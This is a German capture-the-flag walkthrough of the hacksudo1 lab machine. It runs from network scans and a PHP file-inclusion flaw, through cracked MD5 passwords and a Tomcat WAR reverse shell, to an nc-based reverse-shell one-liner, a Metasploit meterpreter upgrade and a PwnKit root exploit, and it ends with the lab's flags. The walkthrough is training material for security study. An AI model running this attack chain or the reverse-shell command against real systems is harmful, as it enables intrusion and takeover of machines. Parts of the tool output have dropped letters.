Zuerst wird mit arp-scan das Netzwerk gescannt, um die IP-Adresse des Ziels zu ermitteln.
ARP-Scan
192.168.2.131 08:00:27:ea:4c:9f PCS Systemtechnik GmbH
Als Nächstes wird die /etc/hosts-Datei bearbeitet, um den Hostnamen hacksudo1.vln der IP-Adresse zuzuordnen.
/etc/hosts
192.168.2.131 hacksudo1.vln
Nmap wird verwendet, um offene Ports und Dienste auf dem Zielsystem zu scannen. Die Option -Pn wird verwendet, um Host Discovery zu überspringen, falls ICMP blockiert ist.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 13:57 CEST
Nmap scan report for hacksudo1.vln (192.168.2.131)
Host is up (0.00017s latency).
Not shown: 65532 filtered tcp ports (no-response)
PRT STATE SERVICE VERSIN
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Hacksudo | shops
|_http-server-header: Apache/2.4.46 (Ubuntu)
2222/tcp open ssh penSSH 8.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3a:83:d2:9a:7c:65:ff:16:91:9b:ec:2b:93:74:90:e9 (RSA)
| 256 47:98:2c:ba:49:b3:0f:3b:35:b3:22:c6:21:9c:bf:c9 (ECDSA)
|_ 256 a1:96:b1:98:65:fb:1f:f8:b5:57:d1:2a:30:b3:12:b1 (ED25519)
8080/tcp open http Apache Tomcat 9.0.24
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.24
MAC Address: 08:00:27:EA:4C:9F (racle VirtualBox virtual NIC)
Warning: SScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), Synology DiskStation Manager 5.X (90%), Netgear RAIDiator 4.X (87%)
S CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3
Aggressive S guesses: Linux 4.15 - 5.8 (97%), Linux 5.0 - 5.4 (97%), Linux 5.0 - 5.5 (95%), Linux 2.6.32 (91%), Linux 3.10 - 4.11
No exact S matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: S: Linux; CPE: cpe:/o:linux:linux_kernel
TRACERUTE
HP RTT ADDRESS
1 0.17 ms hacksudo1.vln (192.168.2.131)
Nikto wird verwendet, um den Webserver auf Schwachstellen zu scannen.
- Nikto v2.5.0
+ Target IP: 192.168.2.131
+ Target Hostname: 192.168.2.131
+ Target Port: 80
+ Start Time: 2024-09-19 14:00:25 (GMT2)
+ Server: Apache/2.4.46 (Ubuntu)
+ /: The anti-clickjacking X-Frame-ptions header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-ptions
+ /: The X-Content-Type-ptions header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /scripts/: Directory indexing found.
+ Apache/2.4.46 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EL for the 2.x branch.
+ PTINS: Allowed HTTP Methods: PTINS, HEAD, GET, PST .
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /admin.php?en_log_id=0&action=config: EasyNews version 4.3 allows remote admin access. This PHP file should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5412
+ /admin.php?en_log_id=0&action=users: EasyNews version 4.3 allows remote admin access. This PHP file should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5412
+ /admin.php: This might be interesting.
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /html/: This might be interesting.
+ /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823
+ /README.md: Readme Found.
+ 8910 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2024-09-19 14:01:03 (GMT2) (38 seconds)
+ 1 host(s) tested
Gobuster wird verwendet, um weitere Verzeichnisse und Dateien zu entdecken.
http://192.168.2.131/index.php (Status: 200) [Size: 2550]
http://192.168.2.131/search.php (Status: 200) [Size: 5296]
http://192.168.2.131/products.sql (Status: 200) [Size: 6681]
http://192.168.2.131/info.txt (Status: 200) [Size: 162]
http://192.168.2.131/html (Status: 301) [Size: 313] [--> http://192.168.2.131/html/]
http://192.168.2.131/users.sql (Status: 200) [Size: 1671]
http://192.168.2.131/signup.php (Status: 200) [Size: 696]
http://192.168.2.131/admin.php (Status: 200) [Size: 1925]
http://192.168.2.131/scripts (Status: 301) [Size: 316] [--> http://192.168.2.131/scripts/]
http://192.168.2.131/cart.html (Status: 200) [Size: 2344]
http://192.168.2.131/add.php (Status: 200) [Size: 940]
http://192.168.2.131/css (Status: 301) [Size: 312] [--> http://192.168.2.131/css/]
http://192.168.2.131/log.php (Status: 200) [Size: 922]
http://192.168.2.131/hp.php (Status: 200) [Size: 9676]
http://192.168.2.131/query.txt (Status: 200) [Size: 185]
http://192.168.2.131/pro.php (Status: 200) [Size: 914]
http://192.168.2.131/config.php (Status: 200) [Size: 592]
http://192.168.2.131/res (Status: 301) [Size: 312] [--> http://192.168.2.131/res/]
http://192.168.2.131/LICENSE (Status: 200) [Size: 1071]
http://192.168.2.131/delete.php (Status: 200) [Size: 519]
http://192.168.2.131/inventory.php (Status: 200) [Size: 2808]
http://192.168.2.131/hg.php (Status: 200) [Size: 9672]
http://192.168.2.131/view_cart.php (Status: 200) [Size: 3039]
http://192.168.2.131/level1.sh (Status: 200) [Size: 185]
http://192.168.2.131/fandom.php (Status: 200) [Size: 1464]
http://192.168.2.131/got.php (Status: 200) [Size: 9696]
http://192.168.2.131/add_product.php (Status: 200) [Size: 3243]
http://192.168.2.131/flag1.txt (Status: 200) [Size: 12]
Progress: 13677696 / 13677758 (100.00%)
Durch die Analyse der index.php-Datei wurde eine File Inclusion-Schwachstelle entdeckt.
view-source:http://192.168.2.131/index.php
$file = $ GET['file'];
if(isset($file))
{
include("$file");
}
else
{
include("index.php");
}
Auf dem Tomcat Server auf Port 8080 wurden Anmeldeinformationen gefunden.
192.168.2.131:8080/host-manager
-- phpMyAdmin SQL Dump
-- version 4.5.1
-- http://www.phpmyadmin.net
--
-- Host: 127.0.0.1
-- Generation Time: ct 18, 2016 at 06:22 PM
-- Server version: 10.1.16-MariaDB
-- PHP Version: 5.6.24
...
..
--
-- Dumping data for table `users`
--
INSERT INT `users` (`id`, `fname`, `lname`, `phone`, `email`, `password`) VALUES
(16, 'Jimit', 'Dholakia', 12345678, 'jimit@example.com', 'b15fbfaac3776e5a2ad330fbf7976da7'),
(17, 'Admin', 'Admin', 12345, 'admin@example.com', '21232f297a57a5a743894a0e4a801fc3');
Die Passwörter wurden mit CrackStation entschlüsselt.
https://crackstation.net/
Hash Type Result
'Admin', 'Admin', 12345, 'admin@example.com' 21232f297a57a5a743894a0e4a801fc3 md5 admin
'Jimit', 'Dholakia', 12345678, 'jimit@example.com' b15fbfaac3776e5a2ad330fbf7976da7 md5 100596
Es wurde versucht, eine WAR-Datei hochzuladen, um eine Reverse Shell zu erhalten.
http://192.168.2.131:8080/manager/html
tomcat:tomcat
WAR Datei auswählen : benhack.war
/benhack
Eine Reverse Shell wurde erstellt.
revshell: http://192.168.2.131:8080/benhack/
listening on [any] 5555 ...
connect to [192.168.2.199] from (UNKNWN) [192.168.2.131] 41272
tomcat@hacksudo:/$ stty rows 48 columns 94
tomcat@hacksudo:/$ id
uid=1003(tomcat) gid=1003(tomcat) groups=1003(tomcat)
tomcat@hacksudo:/$
Es wurden SUID-Dateien gesucht.
tomcat@hacksudo:/$ find / -type f -perm -4000 -ls 2>/dev/null
1186729 24 -rwsr-xr-x 1 root root 22840 Aug 3 2020 /usr/libexec/polkit-agent-helper-1
1184406 132 -rwsr-xr-x 1 root root 133960 Nov 19 2020 /usr/lib/snapd/snap-confine
1182400 52 -rwsr-xr-- 1 root messagebus 51496 Sep 10 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
1182612 468 -rwsr-xr-x 1 root root 477672 Jun 7 2020 /usr/lib/openssh/ssh-keysign
1181594 52 -rwsr-xr-x 1 root root 53040 May 28 2020 /usr/bin/chsh
1181588 84 -rwsr-xr-x 1 root root 85064 May 28 2020 /usr/bin/chfn
1181717 88 -rwsr-xr-x 1 root root 88464 May 28 2020 /usr/bin/gpasswd
1182123 72 -rwsr-xr-x 1 root root 72072 Aug 30 2020 /usr/bin/su
1181850 56 -rwsr-xr-x 1 root root 55680 Aug 30 2020 /usr/bin/mount
1199340 180 -rwsr-xr-x 1 root root 182472 Jan 19 2021 /usr/bin/sudo
1181699 40 -rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
1182193 40 -rwsr-xr-x 1 root root 39296 Aug 30 2020 /usr/bin/umount
1181918 32 -rwsr-xr-x 1 root root 31032 Aug 3 2020 /usr/bin/pkexec
1181864 44 -rwsr-xr-x 1 root root 44784 May 28 2020 /usr/bin/newgrp
1181897 68 -rwsr-xr-x 1 root root 68208 May 28 2020 /usr/bin/passwd
1181482 56 -rwsr-sr-x 1 daemon daemon 55712 Jul 10 2020 /usr/bin/at
In /var/www wurde eine Backup-Datei gefunden.
tomcat@hacksudo:/$ cat /var/www/backup
recover your access,from *
Der Inhalt des /home-Verzeichnisses wird angezeigt.
tomcat@hacksudo:/$ ls /home/
hacksudo vishal
Die Datenbank-Anmeldeinformationen wurden in config.php gefunden.
tomcat@hacksudo:/$ cat /var/www/html/config.php
$currency = '₹ '; //Currency Character or code
$db_username = 'root';
$db_password = '';
$db_name = 'hacksudo';
$db_host = 'localhost';
Laufende Prozesse und Netzwerkverbindungen werden angezeigt.
tomcat@hacksudo:/$ ss -altpn
State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 128 0.0.0.0:2222 0.0.0.0:*
LISTEN 0 1 [ffff:127.0.0.1]:8005 *:* users:(("java",pid=843,fd=65))
LISTEN 0 100 *:8009 *:* users:(("java",pid=843,fd=50))
LISTEN 0 128 []:2222 []:*
LISTEN 0 100 *:8080 *:* users:(("java",pid=843,fd=44))
LISTEN 0 511 *:80 *:*
In der Tomcat-Konfiguration wurden Anmeldeinformationen gefunden.
tomcat@hacksudo/conf$ cat tomcat-users.xml-->
Metasploit wird verwendet, um die Privilegien zu erhöhen.
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost eth0
lhost => eth0
msf6 exploit(multi/handler) > set lport 4444
[!] Unknown datastore option: lßport. Did you mean LPRT?
lßport => 4444
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.2.199:4444
Eine Shell wird zum Meterpreter migriert.
tomcat@hacksudo:/tmp$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.199 4444 >/tmp/f
rm: cannot remove '/tmp/f': No such file or directory
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.131:46990) at 2024-09-19 15:26:07 +0200
Shell Banner:
$
--
$ ^Z
Background session 1? [y/N] y
msf6 exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > set lport 5555
lport => 5555
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.2.199:5555
[*] Sending stage (1017704 bytes) to 192.168.2.131
[*] Meterpreter session 2 opened (192.168.2.199:5555 -> 192.168.2.131:41278) at 2024-09-19 15:27:21 +0200
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > search suggester
Matching Modules
-
# Name Disclosure Date Rank Check Description
- - - -- --
0 post/multi/recon/local_exploit_suggester . normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
Active sessions
=
Id Name Type Information Connection
-- - - -- -
1 shell sparc/bsd Shell Banner: $ -- 192.168.2.199:4444 -> 192.168.2.1
31:46990 (192.168.2.131)
2 meterpreter x86/linux tomcat @ 192.168.2.131 192.168.2.199:5555 -> 192.168.2.1
31:41278 (192.168.2.131)
[*] 192.168.2.131 - Collecting local exploits for x86/linux...
[*] 192.168.2.131 - 196 exploit checks are being tried...
[+] 192.168.2.131 - exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe: The target appears to be vulnerable.
[+] 192.168.2.131 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.2.131 - exploit/linux/local/cve_2022_0847_dirtypipe: The target appears to be vulnerable. Linux kernel version found: 5.8.0
[+] 192.168.2.131 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[+] 192.168.2.131 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.2.131 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 192.168.2.131 - exploit/linux/local/sudoedit_bypass_priv_esc: The target appears to be vulnerable. Sudo 1.9.1.pre.1ubuntu1.1 is vulnerable, but unable to determine editable file. S can NT be exploited by this module
[*] Running check method for exploit 64 / 64
[*] 192.168.2.131 - Valid modules for session 2:
# Name Potentially Vulnerable? Check Result
- - --
1 exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe Yes The target appears to be vulnerable.
2 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
3 exploit/linux/local/cve_2022_0847_dirtypipe Yes The target appears to be vulnerable. Linux kernel version found: 5.8.0
4 exploit/linux/local/netfilter_priv_esc_ipv4 Yes The target appears to be vulnerable.
5 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
6 exploit/linux/local/su_login Yes The target appears to be vulnerable.
7 exploit/linux/local/sudoedit_bypass_priv_esc Yes The target appears to be vulnerable. Sudo 1.9.1.pre.1ubuntu1.1 is vulnerable, but unable to determine editable file. S can NT be exploited by this module
Der Exploit cve_2021_4034_pwnkit_lpe_pkexec wird verwendet.
session => 2
[*] Started reverse TCP handler on 192.168.2.199:4444
[*] Running automatic check ("set AutoCheck false" to disable)
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] run: Interrupted
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set lport 4445
lport => 4445
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.2.199:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.ekixginuiegs
[+] The target is vulnerable.
[*] Writing '/tmp/.owsfcq/yqhpehv/yqhpehv.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.owsfcq
[*] Sending stage (3045380 bytes) to 192.168.2.131
[+] Deleted /tmp/.owsfcq/yqhpehv/yqhpehv.so
[+] Deleted /tmp/.owsfcq/.amozxxix
[+] Deleted /tmp/.owsfcq
[*] Meterpreter session 3 opened (192.168.2.199:4445 -> 192.168.2.131:50072) at 2024-09-19 15:30:57 +0200
Eine Root-Shell wurde erhalten.
Process 4328 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),1003(tomcat)
Die Root-Flagge wird angezeigt.
cd /root
ls
level4.sh
root.txt
snap
cat root.txt
53555e221628c30119f01dcaa3f711b9
Die User-Flagge wird angezeigt.
cd /home/hacksudo
ls
get
getmanager
level3.sh
user.txt
cat user.txt
bb81133d9e5c204f15a466d357f3b519
Metasploit - Die Privilegienerhöhung war erfolgreich.